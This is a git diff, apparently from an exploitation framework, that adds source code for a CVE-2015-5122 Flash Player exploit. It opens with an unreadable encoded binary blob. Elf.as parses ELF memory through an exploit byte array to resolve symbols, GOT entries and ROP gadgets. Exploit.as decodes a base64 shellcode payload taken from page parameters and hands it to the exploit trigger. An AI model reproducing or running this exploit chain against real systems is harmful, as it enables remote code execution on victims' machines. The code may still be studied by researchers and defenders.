zpON@EiC>WTC5eYfJWS#d5|5I2jKr@={D#EiB%UPkI}%Tmc!tEYBzBS*Au&o~7m3{@
z_K<ji#9Ji(LE>!^dr4R%-XZZX67Q0DkHo)8yiei-5+9QI4~dURd`#lM?0<|+{)C*L
zO6M?#^E6Jrr<3yx={%F1JGh={TQ>AghRVL7W-n2)&_^>Gu$8QX<;%s4oXPG2#WQ{C
z5@kJlD2Tht0USAci82ciI``})3TVMRg^k!^_D)-(l)yNEZ%re%nlp+UVHO~By6u<M
z*$DFh*)#0Fata!iES5Xd{wuGm5e#4Xkwztl6--$|eW@_osN}Muh6W{%O_)Q>U&Wh<
z_-o=ZMEo^r9r1om24UC)Ks1T>Yic*qeoZ@xXunE8AvT#!UrelDGwO)-YvvI|`sHtL
zP)gV=uysvmvsZ!di_KZ@f>N?yEtZ9tTew8YRamLtF4{a$olRo>v$HoZQF0VEzt7IB
z*}DXw8@6DeQJKRQ4m5!WtPJHXW#uUEJXV2n&S#Y<pUJ9Ft_3WBqAX<9$YvR<L4nFy
zEecV=>X7|PR^QX0RIx?a$`3M_MPQ0gf_PvlAqnCE9!Qy~%u;|A$RyCtVri}5u)}j;
zt$-hK<oaes<x3jCAg1xgrs`BcPwp6?hfGBl;V5~r4d_{H9UkIA4rMZxw9TX?NxHp?
zZf7g2$Z&zYZP0DtB2}#vw~vKR<M9NPiGl-%&fZU;KSJK+UImbukbMUapdd*FXTusM
zaxfU0NYIhNjDv1WL3Eb^VPW0Cc80QMFVAAJZ0ia}`jA)BafBc?ikAt8al1sWxb~C`
z=X7ddK<R|}_`FWo5zkg`2P$K}#IczCZU&4?D1RiF&!B+@Eg+>+?2Klg4pZD`;DnuQ
zZBGS71wl9NCCrHSGiKe(c7<}HIcHPM)_nw9DX?w5-_No!!2;R>uR==F`Z+);qroDU
zTSMTYD*YGC`UMN+k>>=m2tZi^*aaYg1Qe;m06@ltSRSHSikBfzl`g!@paJJ{31DEz
z8oNt{>GWHvm`|h@lOQKgAeReab9gT^`P0mLilG8_TTfHLpmT?U8QHLN0?GvF+{uE~
zs?Rd(+0-KK1Q%B}5}!CCwdqEY5sG6Mlh);*W~7n#pretuhrt{usbKz|g>pug=P(NS
zB1JGd5}pVkO=!|6cv6sO_gGVU$WHTA<o<L(PAJo-b0A)*5zpc~M`BZeT0vWS85(>#
zLV*se99q#kqf@sMGX{RCc8QJ)?TVOv6fhG3e?<WwL%?b9%}6}{4EgR%d%Sp9*pJi8
zF*EV_D-`fG1e^}vtc35s$oD<?&VX-r!uL!llY+cyXLKffbI7*@8Tc0YUIJg_6la2z
z(<E;g!sRBOzMjJU0O6*<H;)?g15O2n_g+?^+zIv6^^D{OPI9A4@@Vb1kjLmxsMb&L
z=yYj2`#yCk*o|Ozdpc<VLzi$i)O>f@)J6}hI{}%S1MSO45Q-Ffr<lhF=b|g*YiO}w
z!}GUl2%5K3mY1^OQgqiR)X==;^OWIv=#@{ZU^;qAbqL>nr;eb?N#Ffx)uFhXFDdTA
zg;3>9m^Z-LXDR87M;A!B5Quvh9vMMYqv0~r;SH59FIPb3294clMYIwcyP>LR6=_FS
z2WybiJ&ykiwtp?D*pmP69sd{AP(AcEp<cRJ`oHA(|3M8M7CkI__|E7N(jUscGX9q(
zgH&`$!v7WW?*Pk3umQ2Ys-mCetFR;c2O3OJ@0Ioc2Gu+xc?|e~z%u02${y=Yb(i(`
zM4h~qtdoC?uM_iBX!h>9mo$|@7qrVfb#}PLdUve&|8}zX{<z|Q;P`(yuK53P{6893
z%#R)a|Bfr>C*%(zh9C<0DHXDSX3r?fcqY_%rN-|J+xYtVpxpT;v_!!+*nrGl4CnOR
ze7G*rLQ6x-Ld&AdqOHr90a^+)88mxK(0G?=;QX6zT~0qUtt;qf29$g8GtIhMGT=~0
zrvVNMBh1x^6RA;8xDm?8%c1suGlePwk)itz>iD-)usac~0xJD59dI`}qm^58Pr)<y
z+J9I-0l`(Gs~m-LLHAZR@%^^H>?-8{Q^)^j+E`a1{|6lZpKD`Xh5R3M{GqH1vN5}>
zkUw;C5&w#<xigW8$Lv4M@}1F@LAv{E$Kx!_b*rS$;~H^o>?}WCnfLs>^7*}Nii=r0
z5o~(yG{o>6JpdZ7Qfqf2AWI4OM|qp-=1+;+JmvPE?VA6Kwp6`>{gyq$R<C)3S?mM+
z?%>}9`S9vB$^>fT6HuLRQgyzCs$Pfa-j+F_7X9abTGXO=r-FkBKeMfW*$oRKB5K(8
z?1uff-LUUdlNA&9By74H*2hR=FRNBQ)+GNBCOn!`K0$99#(O3)(d3cmY5G#@41H&4
z{qpq+(mE6Or;db+tsT0Yx6Y!Unbz6#Gs8MZm)+<*J=yy<BzoWZV}6Sgeiw}SZA|!G
zXw&V$NIoqWF40jLm+Cv`Js&;#;oT#n;iFv~4Re_!+#zP43Iw{E0)5vG^vGDC?;)#4
zW4ffS`+a?9@EFwRHIjk{Cf3~7QP;f%PnHZXgINK5+1#RonkZS&yQ!eE4-xM5Y?K(h
zLy0c3$LS)f^-~HKExw#yWu%799?-1^^w2Wv=MWfu$Bsmg8;Ksje3^=5tOs?VB*Q0I
zzmUIv>zDc{^rgcmS`VQnM&&4d81?-qB1Px5`zuYLk2xN8e<hz^+dlXWg`%NooAn!b
zw9g?j*BZUldJ=z4l?+E1iBaNMeL9hQHg7EVU^$}J8y#zhWP9z>m+~oPHLKUW1nP+Q
z&{LHu#5%Pawe|vPP1e{8KxL!IFY4BdROFZJA}>lS@*i|?yPkkD|B)R2u-|$)S=K*M
zYfPnRk3qDrC!&4bj`nXlsFV=xoBNCQ@A@d!QKgLft;8P`{Xde?zfI9kqv%73{$Gjc
z|7A!2zHYro#h+%qPpN!hr;^@YA3E*zAE&)OqB491?e%dokxwX*5?T{YLLz5KHk=!o
za)x2;Fkl;EcDTbj%RrFn)LVNH<a`+f{q20LXHk3KHmq+Na`apbiXz$NDrG%=+i+%Z
z8XMGmE;Ulhd|BcTD)SX!d7|m!DkIU2uBJ3+P?~Y1c@5G`_Va6y?k$Y{2n4Bix<5=$
z7mQ6ZvRjQ2>caO(%8?%<Gb5l`L_Q?h#_fsB9qVN7&ScVeQPMMkZq@KchSN`L#~kG1
z8RWv+Y0y$}gu=`kTU5>_y2Z0;YPwh|A1+ibmh?ObdKoBOVw*w7BXbkouru0|?B-WG
zo>)<gd0ypsZcO#O+VMO#)$==!XKSkGcLlOGC$ZRj1lh43#aBfy2KZcR=3-<L6ge0H
z*z9;hfEEY&>$QGIkCoD6*$D7FJ+=prZH}(NgYy#pq|RymS^5{le}2OMZSvnM{X5}r
zCj9?H{vS*K0{AaT`0s#TrFAw4TsB9$;J+~8e=+%gTlz=gUq%_8jQm^!f12>GaS>Te
zbn{3sh84l}WQM9-2g%KaG#lQ8K<Fi;Yf+)x1SQS&jN}GRa-({ai#TGUn}eIs)4&oF
z?X$TA?v$S0@Vv`~e%uE-7+LOISY-qYO!8GgJ%y&Y?C-$;=Q2!Z?l9b7fuVBb4#54Z
zvGB>M=rMV}AQyXIG-9;JUDgvWXKc{BgtBZs2~r)3CW5KvsifO)fhuNchc2g95X2-F
zMTyr<HWt0sa}+-`Q986>gN8Re)k+0NOU_26yhJtnM}+8;#0h_*u)&j1*jHS5*Y#Pi
zQRqr~c@H7<Un%sPG7PN--XfQL4^X$23ypsyy{OYlueXz4)McgDKa*b6VWrpJq!)Ep
z>19#cRf#tKShg`HmXBT5|4`HsS!hYd5&+N-Tc#3iJ~MQ38hHbKd+lJMLEAIQ|3YLg
zUflW@3&qFXB5D{K&%ZQ6Lt{~?Q)27kd721q85drYyfB9KHRSf8{P(b`z&0Pz!bBtr
z)H#ol$Ad{+Vci%?)PXd~`(F}MXrD7H_R+m7fv!kGPwiuK8-k_V2kG+Y#X%f6K!TRf
zi%YbNx!69~kj20exi$ol$sta>QxG^~=i7#T=powe-|0y-ZE8KG)~SOzOn~Gy(%4JE
zIHti9hr)w6@gj{$JJV@#+6mH;m^Y;??qp!1joHs*07CRd($HQuOy-bSKpex?gCYRu
zEj8s;0j;*Swg!j1(!4l+U{aib%P=fnQ%zutJ{;&))`EKmr%7WF8V3Y<(8C%!_6=02
zI9PVkQ4Ba|rWE4%WdcCLu&+xdcy(Ce6{<(5J~G3r777OF@kCM-R3{VVj0(HEFuDs!
za;{MGgqknZ0<ytt;7FxH7*&K&Rs-1a2jh(5_ISKrx3Bmd!-IdMluRh&9KskE7Ad|G
zeDC3-1wnnY*_^q!N^#A@H6NFWYXPo>xXN&q<EpG?b87Hg%QB1H*qYVE60+uMxRxkB
zY~SWLVuR3C7zTpa4a_jirqZS(_WGa}h_`f5#Q_mO%|XqLO&e7Y>Tc}5XhzU*(>4m&
zZD<RUd%UDdtsBeeMZ%RFd!KPH0yMXAQ^cS@<l>Pw)pW=3>FrT>faBHl#-MxV!(mFB
zZf3;rUdhxS2LYd%6{Gh*a%hMR?_^u=VP@LPa+LS5@s*3kCe-{m$$XV$fkv`WCs|~?
z$MC>^7;&wU0$HmLWvrbYMod5#3rw&v%zd<%$N}&cGZFL#+5!3@c7VV}j+qC)%d8uD
zC?lE?@<n|_!3KqKLzE*ZcB#r?urHKJA}g8|%8q8!ULo|6h($S+7tPxl#k)9vc_wW=
zVY`;;b1<i7Ta!WdSsX1c4;4fU%0orbA}OHDgPAWA_ib&Szhl!Yedb#iiT7_A?2O1s
zAvyQWD;gU}X(7Jk?3YBHDXs*t#GVijG#@Vgf-_xOroYTwH|qcuQI?j%{wBDLv=C!+
z6!Bj<b5vT0vM)YM)s|Odma4}rg&9e!tFEfFrz1d90+pYCHo}2%b%k1A5r77-oQx(E
zPNb<w%TJ$*Fw@x6jD40X4TP&%jw-W`nF(gUXSs_o@ytfQH|RehTrMN;9DQuw$smP*
zTqTPRB@M+jnN69BYZ|T+T+?yQz~!IArp(1}DRbwz4QN2<OAwlA*<qRz<Uxi_kQIdD
zggvJi&YWV<oI<BYG=~^MlXFP9J%^<5W2MX?U1M{|na&&{=L%tn;5$C+M{=&nP=18j
zAd`{I;v}<Gk~td5T>VE3L2-&OHcLPm7PEwI-6dxSC{2h32r`1$us0rZlYmhWGWkpM
zg7q9sBx8!mjArhP>dW0kH%g`=<aqa4Q?ZMR*`S<eiE^4Eq_D@k8`0Y1-8VMg9k@M=
zNNkV85`u%2bHMm=;G+Si(0ex#a?$=m77q0ftU&keNxK<W3OoAyhoJW#27^=riwYEM
zRy@|fZDs$Kc%*5|AUIZLcgCRp5B4PDFN*X<2IH-LtA}Ed!Sv{65zI9_)EPraIWukO
z-%lusTK52+3r-T)TZpguypu(uq>Iy1cj^SQhSa&T)fD3Ut&ROwrfq-X;A@MT3TMht
zYpQD#>ms$bqFe=7Os%V|byf`;A;e&+q@vuL(lYt`%Wt~5l4?M^bZ93R!t?+R(j;3Q
zbe1^GmShXA3!V#u0A#|1y96&3coVA=-4n@(3I11bOoCs$g)_5o<>1Q0m5-|cR}roW
zljxjvGV^)d8og2k41RMs)Fm8$Gku9lqf{)>@T0nxfN70s?j<nJ%yjP(fgc0el9YAA
zrD8~`nrRQo!ZsLO4r2&uYy#fxd?KtIt2m#=A_wnxeHQEi7$yxz`gC{b;XGD_{lc~N
zSv^)h=;2bW?D*dCI3waJY@nsT0SS6J_Vz=;?_y+B#hId$cfaJDPi<(%ktq;*IdHTG
zS2t~3-@dY86?mi8Wx+St-?;^>k$vG!k-_|iHEUM1HZ^P@zLuudE7z=O+0c@gq7~5O
zU^2ap8#in~nC8{Ttnzeh85$ymfo*-+jSWplwI9`T94M+<)~|1A&Lo<&qaxea3_`gr
z(&cGd1_qdxcF<Ij4G>u4XzA<nIi8@PTDQS#d#}e@e8?qlw60o8Rzl>^&1qWKlAgKj
zPN2yMZJo$jantHmpuyVEzE9912eIBX?uiWG!q=}}*S>L0GpMe7K*wXY*f;<%Uc?KZ
zhITuD9zy3e$xQ2rzh#{cTwr9-E8XqEbqy<9@}h|bZJ}F1njM_`l3&XspFr7$BA%9G
zTQ{^zUw7n`?jh-!FQK}}w5~$6wgagvxwmpD(qp>&y85>@bPh?Ps>0N8%`J(L`C}oQ
zBY^P9u-dZL<`ym14Lc{T%_~~8?yjCl24VD*?du~5Z=(9_TZxZDc`NZr;i0Em8&<R)
z-{O&qH<BAmw5~cDe$7xo*b0v>LGX06nIKRg=FsewEvq)BbqNr=Y#HkkzLgs{fU?Z4
zV{h*k=z`gmT(qj;=+>nTfGgY8)b2!F&==m?y(v7@KPc;r=6obmI6m}xJiTgZetO{b
zc(iX*!K#*HkYMYI=Ju5Sp4S)I))edR>1r5Lg2_NP9xHVQi1o$_o{4*urIvLV1*=-<
zro=%GHsfooIQ3?e-8%rfZfHKPFeO~4>>=w&ktOx(8`>A3aa)&_>`m)n!YDE*l`@WQ
zf&CW(*5a=<7z>Uy7?1sz99Xt}7#diPr#-N2Z#l5C*SD-_LHD9TE(c^*96GM(Fc?O%
zgKO)Ttv*Jh7ifX(qE4`6m&uD$AGX6LdX7UvXGhrHN+V?5#x-c$!j!<RG%g0W44{>>
zH>_(|wLZ9d-O5BJlH6Q&#C8C5Ib>57Axj46rfkY$WXc%q0I0EyvD+womOY%4S<c)d
zM|2{$UaSzDbelZ@joL|e>9Q{qOuW0x2lvJnieM!)THv)Mf~R{iRzB~`-k#7G2NScy
zLB0x7mgvdgWl7h##lAavV{DC2l%nHbAYWpA4=ATrRUfF<s;dA*uc-|Hc~0bL&|w3B
zyBsKVY&=vFolsQ`VZ*D-17JM^gd9G#b-<EV)K}C3IbL613&baG0|{Cs(WQYJ0)N+3
z)f3XRwgwVJYBeAsss=8-swz+pLZSdb?s`>C1->e(YO5<N^s2gg_y@`>5i(Fwi#!CX
zDym2V%c=*ETlfcRtLq`_uvtP#)PNoUml51`bu|DbmLnHBu&w}vS69}9sSVoTAVR8!
zZ6&w?e}x1_y+W@+$a=k|q83Qm8U(4<YXGdR(_xsYwo<PFZCpUFsjCNq*4}_2&}{i<
z+H$D@F26#ptxA673>FT_ubd;&zjEvi7r<KW&z(Z4^o^Yt*k{7FONmft2o>Z;U^W7$
z5eSW7u4$oA%cWVSfKY3MS|`*+LOo2VM+kL^P#cBXEYzS-mkD)w!iLit*l-f+2B97;
z)MJHuyiiXRYMW5MBGe9{b_q2q)R<8Fg(?B6>Sm$#2o>x`TZDQmbDxZltlP*Eoq=^*
zpt`#698RBDn|pedMRBZY45el(+ja`B?YK_G^;KN|hwE#&zK-h~xP}?TX(Uc3aR!Mq
zN$enT7KyV-oI~PV66cXPpTq?uE+lagiEonl7Kw{VTted8BrYX!8HvkDTtVVW5?7J9
zn#6ZVe3!)cNPM5fH6*SjaUF^4N!&o<2PA$-;zklTk+_+}k4W4?;>YZE#<tx-&N~^a
zSwtU@Y%zT~RsjYVWC3S4D&TxM2AnU)fU_GFaCV~tv>PRYA^^aS;R?C}d5j5n&>bjX
zFlrU_1d2e-><xMY#f*7;L0@1J)aEmS8G$K``7(o<foWhP$_i!$ri1?|JD4575mi=B
zFeiXxsO;QeZUARKIeEdn01k0-^Mm<;`HbZi1PcN<bjdFa76!@~D<}#U1u7UToDiH4
zsDk0G;$U&0nz0EJgA)U_j1^A`P72gBHgR%ra$qq7uXJ!q;BbI2rv|46j%4_<4o(X+
zFgCR$SQ2PrY})kT^gs(^B{PCE0!ta2J~KEo(8|~hf6yN|im{oqg0liE8S~E$&JL_*
zY}TCMoWNQJa|6M-f%ObqgTd0kM#kpO3(gB1!&vG3;QYXGjLkEHX5a+I<}U~?2!t3j
z7X}vw+8J9=7Ay;d8CzH$EDv-tR#p+L2t*hwuMAcOHZfLF6|4$$GguB%Sq*)$W7b1M
zX*v)La@)^=7t*$0!`QZ8``9P@SI2h!u1MMSyT{q}!*{v?t`lMA#00+6#apb+W#+|j
zzLf7eo42{mf*33$6}oTWZ632I20D=mo`-mw*DQ{~tkFd8A9$P3oD}ozWs`j$^0o|f
zN-P5wxH2wP+cM2*vCO@!B=bhKEz6u9%i7CkWc^xg%Qk1mvSBqh`*pP~$D9?*fgP-z
zv$VEcb51OGFPoctv(}bpmd5h-vUz!rX>IxD{8&B!c=@krZ3X6nSOFk;1>e%!3eB=u
z;a*l=c#qyzWLCtAU|^}}S-ow7Srx;#QeeVcdRwts9V_0;YOuH4Hqoq&;q$3(;t!0r
zNoIX)(q6V`(!)mEWOH#0UsQ)p{)5pr#XLMV1qPX>d}y>yHIIzpBWuaj{~2x5%!b&s
zy{vKCRidrLY>JiaWz8ku7j4tcme_P~#7w_Iw9PP=#%6#QX2xTpZKl~8n+YzMnY%@s
z-#jYj-^*6`|1H{PnJZ)XW?MDuVprR2b9HPs=vijp=4zW`u8qwBJ<FUYTy1mB^|84)
z<(vB#S6ivMF;)t&TIp%-wt40;#6ffHyldTU^UdRkgXZ}854qb+^916cInjK{-L}9C
z5eH4%f{)y73(a=op!v$et2}LGW;j;1mvxl=)YDdOcE-?my2_vTv{jgqSjAozt$4@N
zR%vdEfv_r8d6BoR%IuC+(PyOwG}qjBPO@$URnA_vS-BCd-or@t@*BOl@gpzo>9nfW
zEnfQQ1ob-3H&3#Dg7DV;-cU`bHd-61i`Ef(Xn74WnbWq7HXYlvCs`9ihlLK09$p?=
z6kQ|*?byU>aL3-T`LjrVo{}-3vVDyKCAMmoD$76b3W#D{yl;$H2(89?h3+oe_byo(
zI>4<(Qt#H*V8%Yqs>rr=>sLs_u8AEDTh;IX)7WtwCbfZ&IdHxXndR2LIMjm&Bm2wx
z|1a?((@VcteiI)mU5TnqwJ4EdXu@NE_K^CRIvDS1`C_SICt{8B1w{#_>zsS&E6>(4
z_qMk;tgmWsU$`~WX&jA@mj1zn84!Wzn(>h?x}-IUc*7UW3E2*{+o$zQ#E{<7JlZEf
z+Z%5f+~mSBqqOx2t<<3{gMIO)FO~|pse4+n?}1OMQ-+f4^Uea)-U&?Ep*-vhCPJGf
zkqn%gMh2l47$FkoFW8@ObV?>fBptZivT?p<7Jadtb)&y&-H33-7khqCa&4nirR9kX
zzZ_uB+0Tqf25%1#x?sOE)WNo9HE75NG|;jJrpRa0JJ8rHr&U55PpiboQF6~g4p9x?
zKozv3mpYE1hF4ePP00&vkW|&@?I!`8;MA9Aq;)E-rmnKwkUMM<n3}Dx&Dp07@ikao
zDR;v)oZ3_t?!Q){ja*T=A1gg7v;l>*c9mV2TbS>fhZB`z$I=zHjB%!{<$>&VijETt
zHdU}`f|Uq1OBnN|k*g|UR12e481=$fER4g2ailOBYz|l0lm+G+`>ohm#(pmuykgK}
z;mi#e=rTF>qqBxHG8JBQrotzjsVOeEhfO($dA-FGCrwt|GtR_{+CMx~anD9zuY2zB
z%sBu#;fsbTnI>DX5LX$l3S5=A0=Q~$)!|x%>o8nL;97#K5mz&=AS;5lPi6*eS&{0C
zv~C59R<LfB(S(yE6?Uy~=A6|))~&KhCCPwYD_FMzz!}!9VAsmS+^}l}>sAHQx>X@D
zk-|nP%VI@Xv9b&@Z)Mx|&cd7DvF$xAG=a=p6*({ZN2yX!3}8@fP(wUjDR|t$OvW^H
zawlNAfgLB{KIW8^)t`5H;6(4BMA8q4utrF=UT1?Z(u3?b|IS2suo0(L2P#v*Ap12I
zrNWq;eVpNu#~C=k;B<bWdVv^l&MZiq5hn?PxqvEg`IyS>lL<yA6FxA?(K!gU4<4ZN
zh79|ABEOB5gy}>s^*}+his6G3eEUE_vvNZkk*b!HAOo4|JDSswO=CxF_KpuuhNYQ<
z#6oR)4w}x{403LL$+LvdXjej+j)`K8G+sknRCb#=3i(b(8a{6yaW>JM#}BfFX0QBG
z_Q9M-616jK6V2%-9=VCrLZGaK5sk4;wKPnEtl}@erB+cD2+&kr;~bP%K_UB~2ptVt
z-IX|?13$HWCZ1PVAa{%8$r{0P?0q76{H<ZD2nT9F>v&1gS)J_8wfAN;MbmX7;~bSX
zXM8?4$hH+Pu=UuVF^brPVq6n(O~N&0Dw{A3za>m~<%zc{PrSL0_ARIf2g!sUQ-Gq;
zXx{?g%Ywd_!B;20my7rLT%KotE>l;hTr7OYWi6#ZZe=OpG7Q4YA$;mm+&Rkm$XQ8B
zL8`Tih69Wt8z%1c(o;D~zttZSxLi?}RLH}Dn>DaAiajlDSUhhH+J>r~PahXPeKN>&
za5)`tOCdjf1md$leJ&WYG)r&uGG`r`7)DF760iBh0`usWb?dP$JufyiGyvmE+qP|6
z81Cxth+r|$TZUc0nzAUmJw67?<ie>h+~W-_tXWvTu(GPMyh1th^Y(qp)nX@c^n3%$
zZ0uiW4D`cV*Y;p{PXvD%UEP~t^~n{3(I>Lu<m!&E@7~lG>GExj40cDiH_O{aDTjIX
z8h3+4y@_@^&dm0-NJYCHtGhiBt-C!DZ$^7+#1q;N5OccK)JzAt=S&7Pu;c>DDO{rJ
z$Bj|Z6^Vwo^bE}(AN&Am5=<|-HcLcpmxOK+cR*UIiNfvoW}>`wlK_WlPug!Tr!*8I
z@iDTW)y^RvPJCYO6D+MoD2;uJX15*PA{0eh22<OJ0v!B(2*WW|<yEyXp-PifO?^E!
z|7(CltiXyBd-`=+fKC8lOI6ykg9}^m8jM2JVD(r95vT}gHH2KOsfQotELeZ2uCGgc
znSGYsaSbO10bmoLt4Y(HURWY0yJC9pvP{9U1j{A^sMtVbd4fq85VN<&i-k6wpg-U>
zNKS%;T@*A$YKyTE?p{pGB^^LSFaG&_-lB6v!p<p8j1ys!fTqR_#XAXD1Q<Q_!pgP}
z7Ed##!IEgkjNt;s>xb_w_|C@csVn(&*xXWF^Ki|_W#U?ZYay;OT;;eba8=@}!iBBY
zxz)I8aMj|f!&Q%K(cx_F5%@il6&AU%Sj_=~(Tk-4teiqMT9bdMFm|e93YCB8Ib;#l
zFl?YB$R$x<o+V0#!rX4MkLqzZVFl^M<c(;2d1NLvgUdfMfr@maBIT3W(B1Z6PGy+Z
zy)>;e5Z%*so}1^R`CfCF;Zv2XU7FqvxN|+t#zLtlwgd<_hw!KnUJb&hLu45B2-rYs
z4^2=N;8yd_QB3MBJ9ou2D@ZfEj#oj49y6?EHj=T`1~M)O8LK<yu~yLZPk;*_;)!9S
z>m))kV!cIv8Swi${Dz^*roj{0*L1>kOHFHNS4TnGZL4CF@2v!Qx(&XBXp*GV<og);
z{sz7t_@b9-`ULp?4!(e2D!*gaGk{VdC(qJSO&T+&r(UC{UdL0k&4yijJ6&Kip|Sv9
zGEnbH_+Cud%5MXPNytf%_#|wf7Xdk$f|raHB3^nU`SNIe4i1){{_Y`V3Eck=JR6lJ
DUwZKS

literal 0
HcmV?d00001

diff --git a/external/source/exploits/CVE-2015-5122/Elf.as b/external/source/exploits/CVE-2015-5122/Elf.as
new file mode 100755
index 0000000000..ee7283c61c
--- /dev/null
+++ b/external/source/exploits/CVE-2015-5122/Elf.as
@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-5122/Exploit.as b/external/source/exploits/CVE-2015-5122/Exploit.as
new file mode 100755
index 0000000000..e80733e3f0
--- /dev/null
+++ b/external/source/exploits/CVE-2015-5122/Exploit.as
@@ -0,0 +1,37 @@
+package 
+{
+	import flash.display.Sprite
+	import flash.events.Event
+	import mx.utils.Base64Decoder
+	import flash.display.LoaderInfo
+	import flash.utils.ByteArray
+	
+	public class Exploit extends Sprite 
+	{
+		private var b64:Base64Decoder = new Base64Decoder()
+        private var payload:ByteArray
+        private var platform:String
+        private var os:String
+		
+		public function Exploit():void 
+		{
+			//trace("Got to checkpoint 0");
+			if (stage) init();
+			else addEventListener(Event.ADDED_TO_STAGE, init);
+		}
+		
+		private function init(e:Event = null):void 
+		{
+			platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            os = LoaderInfo(this.root.loaderInfo).parameters.os
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)
+            payload = b64.toByteArray()
+
+			removeEventListener(Event.ADDED_TO_STAGE, init);
+			MyClass.TryExpl(this, platform, os, payload)
+		}
+	}
+}
\ No newline at end of file
